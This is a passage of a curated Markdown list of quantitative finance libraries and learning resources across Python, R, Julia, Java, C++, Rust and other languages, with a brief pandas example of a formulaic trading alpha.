- [yfi](https://github.com/nickelkr/yfi) - Yahoo! YQL library. - [chinesestockapi](https://pypi.org/project/chinesestockapi/) - Python API to get Chinese stock price. - [exchange](https://github.com/akarat/exchange) - Get current exchange rate. - [ticks](https://github.com/jamescnowell/ticks) - Simple command line tool to get stock ticker data. - [pybbg](https://github.com/bpsmith/pybbg) - Python interface to Bloomberg COM APIs. - [ccy](https://github.com/lsbardel/ccy) - Python module for currencies. - [tushare](https://pypi.org/project/tushare/) - A utility for crawling historical and Real-time Quotes data of China stocks. - [jsm](https://pypi.org/project/jsm/) - Get the japanese stock market data. - [cn_stock_src](https://github.com/jealous/cn_stock_src) - Utility for retrieving basic China stock data from different sources. - [coinmarketcap](https://github.com/barnumbirr/coinmarketcap) - Python API for coinmarketcap. - [after-hours](https://github.com/datawrestler/after-hours) - Obtain pre market and after hours stock prices for a given symbol. - [bronto-python](https://pypi.org/project/bronto-python/) - Bronto API Integration for Python. - [pytdx](https://github.com/rainx/pytdx) - Python Interface for retrieving chinese stock realtime quote data from TongDaXin Nodes. - [pdblp](https://github.com/matthewgilbert/pdblp) - A simple interface to integrate pandas and the Bloomberg Open API. - [tiingo](https://github.com/hydrosquall/tiingo-python) - Python interface for daily composite prices/OHLC/Volume + Real-time News Feeds, powered by the Tiingo Data Platform. - [iexfinance](https://github.com/addisonlynch/iexfinance) - Python Interface for retrieving real-time and historical prices and equities data from The Investor's Exchange. - [pyEX](https://github.com/timkpaine/pyEX) - Python interface to IEX with emphasis on pandas, support for streaming data, premium data, points data (economic, rates, commodities), and technical indicators. - [alpaca-trade-api](https://github.com/alpacahq/alpaca-trade-api-python) - Python interface for retrieving real-time and historical prices from Alpaca API as well as trade execution. - [metatrader5](https://pypi.org/project/MetaTrader5/) - API Connector to MetaTrader 5 Terminal - [akshare](https://github.com/jindaxiang/akshare) - AkShare is an elegant and simple financial data interface library for Python, built for human beings! <https://akshare.readthedocs.io> - [yahooquery](https://github.com/dpguthrie/yahooquery) - Python interface for retrieving data through unofficial Yahoo Finance API. - [investpy](https://github.com/alvarobartt/investpy) - Financial Data Extraction from Investing.com with Python! <https://investpy.readthedocs.io/> - [yliveticker](https://github.com/yahoofinancelive/yliveticker) - Live stream of market data from Yahoo Finance websocket. - [bbgbridge](https://github.com/ran404/bbgbridge) - Easy to use Bloomberg Desktop API wrapper for Python. - [alpha_vantage](https://github.com/RomelTorres/alpha_vantage) - A python wrapper for Alpha Vantage API for financial data. - [FinanceDataReader](https://github.com/FinanceData/FinanceDataReader) - Open Source Financial data reader for U.S, Korean, Japanese, Chinese, Vietnamese Stocks - [pystlouisfed](https://github.com/TomasKoutek/pystlouisfed) - Python client for Federal Reserve Bank of St. Louis API - FRED, ALFRED, GeoFRED and FRASER. - [python-bcb](https://github.com/wilsonfreitas/python-bcb) - Python interface to Brazilian Central Bank web services. 
- [market-prices](https://github.com/maread99/market_prices) - Create meaningful OHLCV datasets from knowledge of [exchange-calendars](https://github.com/gerrymanoim/exchange_calendars) (works out-the-box with data from Yahoo Finance). - [tardis-python](https://github.com/tardis-dev/tardis-python) - Python interface for Tardis.dev high frequency crypto market data - [lake-api](https://github.com/crypto-lake/lake-api) - Python interface for Crypto Lake high frequency crypto market data - [tessa](https://github.com/ymyke/tessa) - simple, hassle-free access to price information of financial assets (currently based on yfinance and pycoingecko), including search and a symbol class. - [pandaSDMX](https://github.com/dr-leo/pandaSDMX) - Python package that implements SDMX 2.1 (ISO 17369:2013), a format for exchange of statistical data and metadata used by national statistical agencies, central banks, and international organisations. - [cif](https://github.com/LenkaV/CIF) - Python package that include few composite indicators, which summarize multidimensional relationships between individual economic indicators. - [finagg](https://github.com/theOGognf/finagg) - finagg is a Python package that provides implementations of popular and free financial APIs, tools for aggregating historical data from those APIs into SQL databases, and tools for transforming aggregated data into features useful for analysis and AI/ML. - [FinanceDatabase](https://github.com/JerBouma/FinanceDatabase) - This is a database of 300.000+ symbols containing Equities, ETFs, Funds, Indices, Currencies, Cryptocurrencies and Money Markets. ### Excel Integration - [xlwings](https://www.xlwings.org/) - Make Excel fly with Python. - [openpyxl](https://openpyxl.readthedocs.io/en/latest/) - Read/Write Excel 2007 xlsx/xlsm files. - [xlrd](https://github.com/python-excel/xlrd) - Library for developers to extract data from Microsoft Excel spreadsheet files. - [xlsxwriter](https://xlsxwriter.readthedocs.io/) - Write files in the Excel 2007+ XLSX file format. - [xlwt](https://github.com/python-excel/xlwt) - Library to create spreadsheet files compatible with MS Excel 97/2000/XP/2003 XLS files, on any platform. - [DataNitro](https://datanitro.com/) - DataNitro also offers full-featured Python-Excel integration, including UDFs. Trial downloads are available, but users must purchase a license. - [xlloop](http://xlloop.sourceforge.net) - XLLoop is an open source framework for implementing Excel user-defined functions (UDFs) on a centralised server (a function server). - [expy](http://www.bnikolic.co.uk/expy/expy.html) - The ExPy add-in allows easy use of Python directly from within an Microsoft Excel spreadsheet, both to execute arbitrary code and to define new Excel functions. - [pyxll](https://www.pyxll.com) - PyXLL is an Excel add-in that enables you to extend Excel using nothing but Python code. ### Visualization - [D-Tale](https://github.com/man-group/dtale) - Visualizer for pandas dataframes and xarray datasets. - [mplfinance](https://github.com/matplotlib/mplfinance) - matplotlib utilities for the visualization, and visual analysis, of financial data. - [finplot](https://github.com/highfestiva/finplot) - Performant and effortless finance plotting for Python. - [finvizfinance](https://github.com/lit26/finvizfinance) - Finviz analysis python library. - [market-analy](https://github.com/maread99/market_analy) - Analysis and interactive charting using [market-prices](https://github.com/maread99/market_prices) and bqplot. 
## R ### Numerical Libraries & Data Structures - [xts](https://github.com/joshuaulrich/xts) - eXtensible Time Series: Provide for uniform handling of R's different time-based data classes by extending zoo, maximizing native format information preservation and allowing for user level customization and extension, while simplifying cross-class interoperability. - [data.table](https://github.com/Rdatatable/data.table) - Extension of data.frame: Fast aggregation of large data (e.g. 100GB in RAM), fast ordered joins, fast add/modify/delete of columns by group using no copies at all, list columns and a fast file reader (fread). Offers a natural and flexible syntax, for faster development. - [sparseEigen](https://github.com/dppalomar/sparseEigen) - Sparse principal component analysis. - [TSdbi](http://tsdbi.r-forge.r-project.org/) - Provides a common interface to time series databases. - [tseries](https://cran.r-project.org/web/packages/tseries/index.html) - Time Series Analysis and Computational Finance. - [zoo](https://cran.r-project.org/web/packages/zoo/index.html) - S3 Infrastructure for Regular and Irregular Time Series (Z's Ordered Observations). - [tis](https://cran.r-project.org/web/packages/tis/index.html) - Functions and S3 classes for time indexes and time indexed series, which are compatible with FAME frequencies. - [tfplot](https://cran.r-project.org/web/packages/tfplot/index.html) - Utilities for simple manipulation and quick plotting of time series data. - [tframe](https://cran.r-project.org/web/packages/tframe/index.html) - A kernel of functions for programming time series methods in a way that is relatively independently of the representation of time. ### Data Sources - [IBrokers](https://cran.r-project.org/web/packages/IBrokers/index.html) - Provides native R access to Interactive Brokers Trader Workstation API. - [Rblpapi](https://github.com/Rblp/Rblpapi) - An R Interface to 'Bloomberg' is provided via the 'Blp API'. - [Quandl](https://www.quandl.com/tools/r) - Get Financial Data Directly Into R. - [Rbitcoin](https://github.com/jangorecki/Rbitcoin) - Unified markets API interface (bitstamp, kraken, btce, bitmarket). - [GetTDData](https://github.com/msperlin/GetTDData) - Downloads and aggregates data for Brazilian government issued bonds directly from the website of Tesouro Direto. - [GetHFData](https://github.com/msperlin/GetHFData) - Downloads and aggregates high frequency trading data for Brazilian instruments directly from Bovespa ftp site. - [Reddit WallstreetBets API](https://dashboard.nbshare.io/apps/reddit/api/) - Provides daily top 50 stocks from reddit (subreddit) Wallstreetbets and their sentiments via the API. - [td](https://github.com/eddelbuettel/td) - Interfaces the 'twelvedata' API for stocks and (digital and standard) currencies. - [rbcb](https://github.com/wilsonfreitas/rbcb) - R interface to Brazilian Central Bank web services. - [rb3](https://github.com/ropensci/rb3) - A bunch of downloaders and parsers for data delivered from B3. - [simfinapi](https://github.com/matthiasgomolka/simfinapi) - Makes 'SimFin' data (<https://simfin.com/>) easily accessible in R. ### Financial Instruments and Pricing - [RQuantLib](https://github.com/eddelbuettel/rquantlib) - RQuantLib connects GNU R with QuantLib. - [quantmod](https://cran.r-project.org/web/packages/quantmod/index.html) - Quantitative Financial Modelling Framework. - [Rmetrics](https://www.rmetrics.org) - The premier open source software solution for teaching and training quantitative finance. 
- [fAsianOptions](https://cran.r-project.org/web/packages/fAsianOptions/index.html) - EBM and Asian Option Valuation. - [fAssets](https://cran.r-project.org/web/packages/fAssets/index.html) - Analysing and Modelling Financial Assets. - [fBasics](https://cran.r-project.org/web/packages/fBasics/index.html) - Markets and Basic Statistics. - [fBonds](https://cran.r-project.org/web/packages/fBonds/index.html) - Bonds and Interest Rate Models. - [fExoticOptions](https://cran.r-project.org/web/packages/fExoticOptions/index.html) - Exotic Option Valuation. - [fOptions](https://cran.r-project.org/web/packages/fOptions/index.html) - Pricing and Evaluating Basic Options. - [fPortfolio](https://cran.r-project.org/web/packages/fPortfolio/index.html) - Portfolio Selection and Optimization. - [portfolio](https://github.com/dgerlanc/portfolio) - Analysing equity portfolios. - [sparseIndexTracking](https://github.com/dppalomar/sparseIndexTracking) - Portfolio design to track an index. - [covFactorModel](https://github.com/dppalomar/covFactorModel) - Covariance matrix estimation via factor models. - [riskParityPortfolio](https://github.com/dppalomar/riskParityPortfolio) - Blazingly fast design of risk parity portfolios. - [sde](https://cran.r-project.org/web/packages/sde/index.html) - Simulation and Inference for Stochastic Differential Equations. - [YieldCurve](https://cran.r-project.org/web/packages/YieldCurve/index.html) - Modelling and estimation of the yield curve. - [SmithWilsonYieldCurve](https://cran.r-project.org/web/packages/SmithWilsonYieldCurve/index.html) - Constructs a yield curve by the Smith-Wilson method from a table of LIBOR and SWAP rates. - [ycinterextra](https://cran.r-project.org/web/packages/ycinterextra/index.html) - Yield curve or zero-coupon prices interpolation and extrapolation. - [AmericanCallOpt](https://cran.r-project.org/web/packages/AmericanCallOpt/index.html) - This package includes pricing function for selected American call options with underlying assets that generate payouts. - [VarSwapPrice](https://cran.r-project.org/web/packages/VarSwapPrice/index.html) - Pricing a variance swap on an equity index. - [RND](https://cran.r-project.org/web/packages/RND/index.html) - Risk Neutral Density Extraction Package. - [LSMonteCarlo](https://cran.r-project.org/web/packages/LSMonteCarlo/index.html) - American options pricing with Least Squares Monte Carlo method. - [OptHedging](https://cran.r-project.org/web/packages/OptHedging/index.html) - Estimation of value and hedging strategy of call and put options. - [tvm](https://cran.r-project.org/web/packages/tvm/index.html) - Time Value of Money Functions. - [OptionPricing](https://cran.r-project.org/web/packages/OptionPricing/index.html) - Option Pricing with Efficient Simulation Algorithms. - [credule](https://github.com/blenezet/credule) - Credit Default Swap Functions. - [derivmkts](https://cran.r-project.org/web/packages/derivmkts/index.html) - Functions and R Code to Accompany Derivatives Markets. - [FinCal](https://github.com/felixfan/FinCal) - Package for time value of money calculation, time series analysis and computational finance. - [r-quant](https://github.com/artyyouth/r-quant) - R code for quantitative analysis in finance. - [options.studies](https://github.com/taylorizing/options.studies) - options trading studies functions for use with options.data package and shiny. - [PortfolioAnalytics](https://github.com/braverock/PortfolioAnalytics) - Portfolio Analysis, Including Numerical Methods for Optimizationof Portfolios. 
- [fmbasics](https://github.com/imanuelcostigan/fmbasics) - Financial Market Building Blocks. - [R-fixedincome](https://github.com/wilsonfreitas/R-fixedincome) - Fixed income tools for R. ### Trading - [backtest](https://cran.r-project.org/web/packages/backtest/index.html) - Exploring Portfolio-Based Conjectures About Financial Instruments. - [pa](https://cran.r-project.org/web/packages/pa/index.html) - Performance Attribution for Equity Portfolios. - [TTR](https://github.com/joshuaulrich/TTR) - Technical Trading Rules. - [QuantTools](https://quanttools.bitbucket.io/_site/index.html) - Enhanced Quantitative Trading Modelling. - [blotter](https://github.com/braverock/blotter) - Transaction infrastructure for defining instruments, transactions, portfolios and accounts for trading systems and simulation. Provides portfolio support for multi-asset class and multi-currency portfolios. Actively maintained and developed. ### Backtesting - [quantstrat](https://github.com/braverock/quantstrat) - Transaction-oriented infrastructure for constructing trading systems and simulation. Provides support for multi-asset class and multi-currency portfolios for backtesting and other financial research. ### Risk Analysis - [PerformanceAnalytics](https://github.com/braverock/PerformanceAnalytics) - Econometric tools for performance and risk analysis. ### Factor Analysis - [FactorAnalytics](https://github.com/braverock/FactorAnalytics) - The FactorAnalytics package contains fitting and analysis methods for the three main types of factor models used in conjunction with portfolio construction, optimization and risk management, namely fundamental factor models, time series factor models and statistical factor models. - [Expected Returns](https://github.com/JustinMShea/ExpectedReturns) - Solutions for enhancing portfolio diversification and replications of seminal papers with R, most of which are discussed in one of the best investment references of the recent decade, Expected Returns: An Investors Guide to Harvesting Market Rewards by Antti Ilmanen. ### Time Series - [tseries](https://cran.r-project.org/web/packages/tseries/index.html) - Time Series Analysis and Computational Finance. - [fGarch](https://cran.r-project.org/web/packages/fGarch/index.html) - Rmetrics - Autoregressive Conditional Heteroskedastic Modelling. - [timeSeries](https://cran.r-project.org/web/packages/timeSeries/index.html) - Rmetrics - Financial Time Series Objects. - [rugarch](https://github.com/alexiosg/rugarch) - Univariate GARCH Models. - [rmgarch](https://github.com/alexiosg/rmgarch) - Multivariate GARCH Models. - [tidypredict](https://github.com/edgararuiz/tidypredict) - Run predictions inside the database <https://tidypredict.netlify.com/>. - [tidyquant](https://github.com/business-science/tidyquant) - Bringing financial analysis to the tidyverse. - [timetk](https://github.com/business-science/timetk) - A toolkit for working with time series in R. - [tibbletime](https://github.com/business-science/tibbletime) - Built on top of the tidyverse, tibbletime is an extension that allows for the creation of time aware tibbles through the setting of a time index. - [matrixprofile](https://github.com/matrix-profile-foundation/matrixprofile) - Time series data mining library built on top of the novel Matrix Profile data structure and algorithms. - [garchmodels](https://github.com/AlbertoAlmuinha/garchmodels) - A parsnip backend for GARCH models. 
### Calendars - [timeDate](https://cran.r-project.org/web/packages/timeDate/index.html) - Chronological and Calendar Objects - [bizdays](https://github.com/wilsonfreitas/R-bizdays) - Business days calculations and utilities ## Matlab ### FrameWorks - [QUANTAXIS](https://github.com/yutiansut/quantaxis) - Integrated Quantitative Toolbox with Matlab. ## Julia - [Lucky.jl](https://github.com/oliviermilla/Lucky.jl) - Modular, asynchronous trading engine in pure Julia. - [QuantLib.jl](https://github.com/pazzo83/QuantLib.jl) - Quantlib implementation in pure Julia. - [Ito.jl](https://github.com/aviks/Ito.jl) - A Julia package for quantitative finance. - [TALib.jl](https://github.com/femtotrader/TALib.jl) - A Julia wrapper for TA-Lib. - [IncTA.jl](https://github.com/femtotrader/IncTA.jl) - Julia Incremental Technical Analysis Indicators - [Miletus.jl](https://github.com/JuliaComputing/Miletus.jl) - A financial contract definition, modeling language, and valuation framework. - [Temporal.jl](https://github.com/dysonance/Temporal.jl) - Flexible and efficient time series class & methods. - [Indicators.jl](https://github.com/dysonance/Indicators.jl) - Financial market technical analysis & indicators on top of Temporal. - [Strategems.jl](https://github.com/dysonance/Strategems.jl) - Quantitative systematic trading strategy development and backtesting. - [TimeSeries.jl](https://github.com/JuliaStats/TimeSeries.jl) - Time series toolkit for Julia. - [MarketTechnicals.jl](https://github.com/JuliaQuant/MarketTechnicals.jl) - Technical analysis of financial time series on top of TimeSeries. - [MarketData.jl](https://github.com/JuliaQuant/MarketData.jl) - Time series market data. - [TimeFrames.jl](https://github.com/femtotrader/TimeFrames.jl) - A Julia library that defines TimeFrame (essentially for resampling TimeSeries). - [DataFrames.jl](https://github.com/JuliaData/DataFrames.jl) - In-memory tabular data in Julia - [TSFrames.jl](https://github.com/xKDR/TSFrames.jl) - Handle timeseries data on top of the powerful and mature DataFrames.jl ## Java - [Strata](http://strata.opengamma.io/) - Modern open-source analytics and market risk library designed and written in Java. - [JQuantLib](https://github.com/frgomes/jquantlib) - JQuantLib is a free, open-source, comprehensive framework for quantitative finance, written in 100% Java. - [finmath.net](http://finmath.net) - Java library with algorithms and methodologies related to mathematical finance. - [quantcomponents](https://github.com/lsgro/quantcomponents) - Free Java components for Quantitative Finance and Algorithmic Trading. - [DRIP](https://lakshmidrip.github.io/DRIP) - Fixed Income, Asset Allocation, Transaction Cost Analysis, XVA Metrics Libraries. - [ta4j](https://github.com/ta4j/ta4j) - A Java library for technical analysis. ## JavaScript - [finance.js](https://github.com/ebradyjobory/finance.js) - A JavaScript library for common financial calculations. - [portfolio-allocation](https://github.com/lequant40/portfolio_allocation_js) - PortfolioAllocation is a JavaScript library designed to help constructing financial portfolios made of several assets: bonds, commodities, cryptocurrencies, currencies, exchange traded funds (ETFs), mutual funds, stocks... - [Ghostfolio](https://github.com/ghostfolio/ghostfolio) - Wealth management software to keep track of financial assets like stocks, ETFs or cryptocurrencies and make solid, data-driven investment decisions. 
- [IndicatorTS](https://github.com/cinar/indicatorts) - Indicator is a TypeScript module providing various stock technical analysis indicators, strategies, and a backtest framework for trading. - [ccxt](https://github.com/ccxt/ccxt) - A JavaScript / Python / PHP cryptocurrency trading API with support for more than 100 bitcoin/altcoin exchanges. - [PENDAX](https://github.com/CompendiumFi/PENDAX-SDK) - Javascript SDK for Trading/Data API and Websockets for FTX, FTXUS, OKX, Bybit, & More. ### Data Visualization - [QUANTAXIS_Webkit](https://github.com/yutiansut/QUANTAXIS_Webkit) - An awesome visualization center based on quantaxis. ## Haskell - [quantfin](https://github.com/boundedvariation/quantfin) - quant finance in pure haskell. - [Haxcel](https://github.com/MarcusRainbow/Haxcel) - Excel Addin for Haskell. - [Ffinar](https://github.com/MarcusRainbow/Ffinar) - A financial maths library in Haskell. ## Scala - [QuantScale](https://github.com/choucrifahed/quantscale) - Scala Quantitative Finance Library. - [Scala Quant](https://github.com/frankcash/Scala-Quant) - Scala library for working with stock data from IFTTT recipes or Google Finance. ## Ruby - [Jiji](https://github.com/unageanu/jiji2) - Open Source Forex algorithmic trading framework using OANDA REST API. ## Elixir/Erlang - [Tai](https://github.com/fremantle-capital/tai) - Open Source composable, real time, market data and trade execution toolkit. - [Workbench](https://github.com/fremantle-industries/workbench) - From Idea to Execution - Manage your trading operation across a globally distributed cluster - [Prop](https://github.com/fremantle-industries/prop) - An open and opinionated trading platform using productive & familiar open source libraries and tools for strategy research, execution and operation. ## Golang - [Kelp](https://github.com/stellar/kelp) - Kelp is an open-source Golang algorithmic cryptocurrency trading bot that runs on centralized exchanges and Stellar DEX (command-line usage and desktop GUI). - [marketstore](https://github.com/alpacahq/marketstore) - DataFrame Server for Financial Timeseries Data. - [IndicatorGo](https://github.com/cinar/indicator) - IndicatorGo is a Golang module providing various stock technical analysis indicators, strategies, and a backtest framework for trading. ## CPP - [QuantLib](https://github.com/lballabio/QuantLib) - The QuantLib project is aimed at providing a comprehensive software framework for quantitative finance. - [QuantLibRisks](https://github.com/auto-differentiation/QuantLib-Risks-Cpp) - Fast risks with QuantLib in C++ - [XAD](https://github.com/auto-differentiation/xad) - Automatic Differentation (AAD) Library - [TradeFrame](https://github.com/rburkholder/trade-frame) - C++ 17 based framework/library (with sample applications) for testing options based automated trading ideas using DTN IQ real time data feed and Interactive Brokers (TWS API) for trade execution. Comes with built-in [Option Greeks/IV](https://github.com/rburkholder/trade-frame/tree/master/lib/TFOptions) calculation library. ## Frameworks - [QuantLib](https://github.com/lballabio/QuantLib) - The QuantLib project is aimed at providing a comprehensive software framework for quantitative finance. 
- QuantLibRisks - Fast risks with QuantLib in [Python](https://pypi.org/project/QuantLib-Risks/) and [C++](https://github.com/auto-differentiation/QuantLib-Risks-Cpp) - XAD - Automatic Differentiation (AAD) Library in [Python](https://pypi.org/project/xad/) and [C++](https://github.com/auto-differentiation/xad/) - [JQuantLib](https://github.com/frgomes/jquantlib) - Java port. - [RQuantLib](https://github.com/eddelbuettel/rquantlib) - R port. - [QuantLibAddin](https://www.quantlib.org/quantlibaddin/) - Excel support. - [QuantLibXL](https://www.quantlib.org/quantlibxl/) - Excel support. - [QLNet](https://github.com/amaggiulli/qlnet) - .Net port. - [PyQL](https://github.com/enthought/pyql) - Python port. - [QuantLib.jl](https://github.com/pazzo83/QuantLib.jl) - Julia port. - [QuantLib-Python Documentation](https://quantlib-python-docs.readthedocs.io/) - Documentation for the Python bindings for the QuantLib library - [TA-Lib](https://ta-lib.org) - perform technical analysis of financial market data. - [ta-lib-python](https://github.com/TA-Lib/ta-lib-python) - [ta-lib](https://github.com/TA-Lib/ta-lib) - [Portfolio Optimizer](https://portfoliooptimizer.io/) - Portfolio Optimizer is a Web API for portfolio analysis and optimization. - XAD: Automatic Differentation (AAD) Library for [Python](https://pypi.org/project/xad/) and [C++](https://github.com/auto-differentiation/xad) ## CSharp - [QuantConnect](https://github.com/QuantConnect/Lean) - Lean Engine is an open-source fully managed C# algorithmic trading engine built for desktop and cloud usage. - [StockSharp](https://github.com/StockSharp/StockSharp) - Algorithmic trading and quantitative trading open source platform to develop trading robots (stock markets, forex, crypto, bitcoins, and options). - [TDAmeritrade.DotNetCore](https://github.com/NVentimiglia/TDAmeritrade.DotNetCore) - Free, open-source .NET Client for the TD Ameritrade Trading Platform. Helps developers integrate TD Ameritrade API into custom trading solutions. ## Rust - [QuantMath](https://github.com/MarcusRainbow/QuantMath) - Financial maths library for risk-neutral pricing and risk - [Barter](https://github.com/barter-rs/barter-rs) - Open-source Rust framework for building event-driven live-trading & backtesting systems - [LFEST](https://github.com/MathisWellmann/lfest-rs) - Simulated perpetual futures exchange to trade your strategy against. - [TradeAggregation](https://github.com/MathisWellmann/trade_aggregation-rs) - Aggregate trades into user-defined candles using information driven rules. - [SlidingFeatures](https://github.com/MathisWellmann/sliding_features-rs) - Chainable tree-like sliding windows for signal processing and technical analysis. - [RustQuant](https://github.com/avhz/RustQuant) - Quantitative finance library written in Rust. - [finalytics](https://github.com/Nnamdi-sys/finalytics) - A rust library for financial data analysis. ## Reproducing Works, Training & Books - [Auto-Differentiation Website](https://auto-differentiation.github.io/) - Background and resources on Automatic Differentiation (AD) / Adjoint Algorithmic Differentitation (AAD). - [Derman Papers](https://github.com/MarcosCarreira/DermanPapers) - Notebooks that replicate original quantitative finance papers from Emanuel Derman. - [ML-Quant](https://www.ml-quant.com/) - Top Quant resources like ArXiv (sanity), SSRN, RePec, Journals, Podcasts, Videos, and Blogs. 
- [volatility-trading](https://github.com/jasonstrimpel/volatility-trading) - A complete set of volatility estimators based on Euan Sinclair's Volatility Trading.
- [quant](https://github.com/paulperry/quant) - Quantitative Finance and Algorithmic Trading exhaust; mostly IPython notebooks based on Quantopian, Zipline, or Pandas.
- [fecon235](https://github.com/rsvp/fecon235) - Open source project for software tools in financial economics. Many Jupyter notebooks to verify theoretical ideas and practical methods interactively.
- [Quantitative-Notebooks](https://github.com/LongOnly/Quantitative-Notebooks) - Educational notebooks on quantitative finance, algorithmic trading, financial modelling and investment strategy.
- [QuantEcon](https://quantecon.org/) - Lecture series on economics, finance, econometrics and data science; QuantEcon.py, QuantEcon.jl, notebooks.
- [FinanceHub](https://github.com/Finance-Hub/FinanceHub) - Resources for quantitative finance.
- [Python_Option_Pricing](https://github.com/dedwards25/Python_Option_Pricing) - A library for pricing financial options, written in Python. Includes: Black-Scholes, Black 76, implied volatility, American, European, Asian, and spread options.
- [python-training](https://github.com/jpmorganchase/python-training) - J.P. Morgan's Python training for business analysts and traders.
- [Stock_Analysis_For_Quant](https://github.com/LastAncientOne/Stock_Analysis_For_Quant) - Different types of stock analysis in Excel, MATLAB, Power BI, Python, R, and Tableau.
- [algorithmic-trading-with-python](https://github.com/chrisconlan/algorithmic-trading-with-python) - Source code for Algorithmic Trading with Python (2020) by Chris Conlan.
- [MEDIUM_NoteBook](https://github.com/cerlymarco/MEDIUM_NoteBook) - Repository containing notebooks of [cerlymarco](https://github.com/cerlymarco)'s posts on Medium.
- [QuantFinance](https://github.com/PythonCharmers/QuantFinance) - Training materials in quantitative finance.
- [IPythonScripts](https://github.com/mgroncki/IPythonScripts) - Tutorials about quantitative finance in Python and QuantLib: pricing, xVAs, hedging, portfolio optimisation, machine learning and deep learning.
- [Computational-Finance-Course](https://github.com/LechGrzelak/Computational-Finance-Course) - Materials for the Computational Finance course.
- [Machine-Learning-for-Asset-Managers](https://github.com/emoen/Machine-Learning-for-Asset-Managers) - Implementation of code snippets, exercises and application to live data from Machine Learning for Asset Managers (Elements in Quantitative Finance) written by Prof. Marcos López de Prado.
- [Python-for-Finance-Cookbook](https://github.com/PacktPublishing/Python-for-Finance-Cookbook) - Python for Finance Cookbook, published by Packt.
- [modelos_vol_derivativos](https://github.com/ysaporito/modelos_vol_derivativos) - Jupyter notebooks for the book "Modelos de Volatilidade para Derivativos".
- [NMOF](https://github.com/enricoschumann/NMOF) - Functions, examples and data from the first and second editions of "Numerical Methods and Optimization in Finance" by M. Gilli, D. Maringer and E. Schumann (2019, ISBN:978-0128150658).
- [py4fi2nd](https://github.com/yhilpisch/py4fi2nd) - Jupyter Notebooks and code for Python for Finance (2nd ed., O'Reilly) by Yves Hilpisch.
- [aiif](https://github.com/yhilpisch/aiif) - Jupyter Notebooks and code for the book Artificial Intelligence in Finance (O'Reilly) by Yves Hilpisch.
- [py4at](https://github.com/yhilpisch/py4at) - Jupyter Notebooks and code for the book Python for Algorithmic Trading (O'Reilly) by Yves Hilpisch. - [dawp](https://github.com/yhilpisch/dawp) - Jupyter Notebooks and code for Derivatives Analytics with Python (Wiley Finance) by Yves Hilpisch. - [dx](https://github.com/yhilpisch/dx) - DX Analytics | Financial and Derivatives Analytics with Python. - [QuantFinanceBook](https://github.com/LechGrzelak/QuantFinanceBook) - Quantitative Finance book. - [rough_bergomi](https://github.com/ryanmccrickerd/rough_bergomi) - A Python implementation of the rough Bergomi model. - [frh-fx](https://github.com/ryanmccrickerd/frh-fx) - A python implementation of the fast-reversion Heston model of Mechkov for FX purposes. - [Value Investing Studies](https://github.com/euclidjda/value-investing-studies) - A collection of data analysis studies that examine the performance and characteristics of value investing over long periods of time. - [Machine Learning Asset Management](https://github.com/firmai/machine-learning-asset-management) - Machine Learning in Asset Management (by @firmai). - [Deep Learning Machine Learning Stock](https://github.com/LastAncientOne/Deep-Learning-Machine-Learning-Stock) - Deep Learning and Machine Learning stocks represent a promising long-term or short-term opportunity for investors and traders. - [Technical Analysis and Feature Engineering](https://github.com/jo-cho/Technical_Analysis_and_Feature_Engineering) - Feature Engineering and Feature Importance of Machine Learning in Financial Market. - [Differential Machine Learning and Axes that matter by Brian Huge and Antoine Savine](https://github.com/differential-machine-learning/notebooks) - Implement, demonstrate, reproduce and extend the results of the Risk articles 'Differential Machine Learning' (2020) and 'PCA with a Difference' (2021) by Huge and Savine, and cover implementation details left out from the papers. - [systematictradingexamples](https://github.com/robcarver17/systematictradingexamples) - Examples of code related to book [Systematic Trading](www.systematictrading.org) and [blog](http://qoppac.blogspot.com) - [pysystemtrade_examples](https://github.com/robcarver17/pysystemtrade_examples) - Examples using pysystemtrade for Robert Carver's [blog](http://qoppac.blogspot.com). - [ML_Finance_Codes](https://github.com/mfrdixon/ML_Finance_Codes) - Machine Learning in Finance: From Theory to Practice Book - [Hands-On Machine Learning for Algorithmic Trading](https://github.com/packtpublishing/hands-on-machine-learning-for-algorithmic-trading) - Hands-On Machine Learning for Algorithmic Trading, published by Packt - [financialnoob-misc](https://github.com/financialnoob/misc) - Codes from @financialnoob's posts - [MesoSim Options Trading Strategy Library](https://github.com/deltaray-io/strategy-library) - Free and public Options Trading strategy library for MesoSim. - [Quant-Finance-With-Python-Code](https://github.com/lingyixu/Quant-Finance-With-Python-Code) - Repo for code examples in Quantitative Finance with Python by Chris Kelliher - [QuantFinanceTraining](https://github.com/JoaoJungblut/QuantFinanceTraining) - This repository contains codes that were executed during my training in the CQF (Certificate in Quantitative Finance). The codes are organized by class, facilitating navigation and reference. 
- [Statistical-Learning-based-Portfolio-Optimization](https://github.com/YannickKae/Statistical-Learning-based-Portfolio-Optimization) - This R Shiny App utilizes the Hierarchical Equal Risk Contribution (HERC) approach, a modern portfolio optimization method developed by Raffinot (2018). - [book_irds3](https://github.com/attack68/book_irds3) - Code repository for Pricing and Trading Interest Rate Derivatives. - [Autoencoder-Asset-Pricing-Models](https://github.com/RichardS0268/Autoencoder-Asset-Pricing-Models) - Reimplementation of Autoencoder Asset Pricing Models ([GKX, 2019](https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3335536)). - [Finance](https://github.com/shashankvemuri/Finance) - 150+ quantitative finance Python programs to help you gather, manipulate, and analyze stock market data. - [101_formulaic_alphas](https://github.com/ram-ki/101_formulaic_alphas) - Implementation of [101 formulaic alphas](https://arxiv.org/ftp/arxiv/papers/1601/1601.00991.pdf) using qstrader.
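To give a concrete flavour of what this last section covers, the 101 Formulaic Alphas entry above implements alphas that are short arithmetic expressions over daily price fields; Alpha#101, for instance, is essentially `(close - open) / ((high - low) + 0.001)`. A minimal pandas sketch on toy data (for illustration only; this is not the qstrader-based implementation in the linked repository):

```python
import pandas as pd

# Toy daily OHLC bars; a real implementation would pull these from a data feed.
bars = pd.DataFrame({
    "open":  [100.0, 101.5,  99.8],
    "high":  [102.0, 103.0, 101.0],
    "low":   [ 99.5, 100.8,  98.9],
    "close": [101.2, 102.4, 100.1],
})

# Alpha#101: the intraday move scaled by the day's range, with a small constant
# in the denominator to avoid division by zero on flat bars.
bars["alpha_101"] = (bars["close"] - bars["open"]) / ((bars["high"] - bars["low"]) + 0.001)
print(bars)
```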
Shadowrocket-ADBlock-Rules
1b691dc27ac483cfc0574c7559c6f9db9293c6f7
